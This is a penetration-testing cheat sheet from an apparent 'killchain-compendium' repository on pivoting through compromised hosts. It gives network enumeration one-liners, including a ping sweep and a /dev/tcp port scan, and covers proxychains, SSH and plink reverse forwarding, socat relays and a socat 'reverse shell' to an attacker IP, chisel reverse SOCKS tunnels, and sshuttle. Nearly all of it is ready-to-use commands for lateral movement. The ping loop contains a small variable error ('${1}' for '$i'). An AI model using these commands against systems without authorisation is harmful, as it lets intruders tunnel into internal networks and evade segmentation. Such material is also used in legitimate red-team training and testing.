killchain-compendium/pivoting.md

Pivoting

• Tunnelling/Proxying
• Port Forwarding

Enumeration

Using material found on the machine and preinstalled tools

• arp -a
• /etc/hosts or C:\Windows\System32\drivers\etc\hosts
• /etc/resolv.conf
• ipconfig /all
• nmcli dev show

Statically compiled tools](https://github.com/andrew-d/static-binaries.git)

Scripting Techniques

for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done

• Using local tools through a proxy like nmap

Tools

Enumerating a network using native and statically compiled tools

Proxychains / FoxyProxy

• Proxychains

  proxychains nc <IP> <PORT>
  

  • Use /etc/proxychains.conf or ./proxychains.confcontaining:

  [ProxyList]
  # add proxy here ...
  # meanwhile
  # defaults set to "tor"
  socks4  127.0.0.1 9050
  # proxy_dns
  

• FoxyProxy

SSH port forwarding and tunnelling (primarily Unix)

• LocalPortForwarding

  ssh -L <LocalPort>:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
  

• Dynamic Port Forwarding

  ssh -D <Port> <user>@<Jumpserver> -fN
  

• Reverse Proxy

  ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN
  

plink.exe (Windows)

• latest version

cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N

• Key generation

  puttygen <keyfile> -o key.ppk
  

Socat

• Reverse shell on target via

  ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
  

  • Attacking bind shell

  sudo nc -lvnp 443
  

• Relay via Jumpserver

  ./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
  

• Quiet Port Forwarding
  • On attacker

  socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
  

  • On relay server

  ./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
  

  • Open localhost:8000
• Processes are backgrounded via &. Therefore, the process can be quit by using the corresponding bg number like kill %1.

Chisel

• Does not require SSH on target

• Reverse Proxy

  • Bind port on attacker

  ./chisel server -p <ListeningPort> --reverse &
  

  • Reverse port on target/proxy

  ./chisel client <attacker-IP>:<attacker-Port> R:socks &
  

  • proxychains.conf contains

  [ProxyList]
  socks5 127.0.0.1 <Listening-Port>
  

• Forward SOCKS Proxy

  • Proxy/compromised machine

  ./chisel server -p <Listen-Port> --socks5
  

  • On attacker

  ./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
  

• Remote Port Forward

  • On attacker

  ./chisel server -p <Listen-Port> --reverse &
  

  • On forwarder

  ./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
  

• Local Port Forwarding

  • On proxy

  ./chisel server -p <Listen-Port>
  

  • On attacker

  ./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
  

sshuttle

• pip install sshuttle
• sshuttle -r <user>@<target> <subnet/CIDR>
• or automatically determined

sshuttle -r <user>@<target> -N

• Key based auth

sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>

• Exclude servers via -x, for example the target/gateway server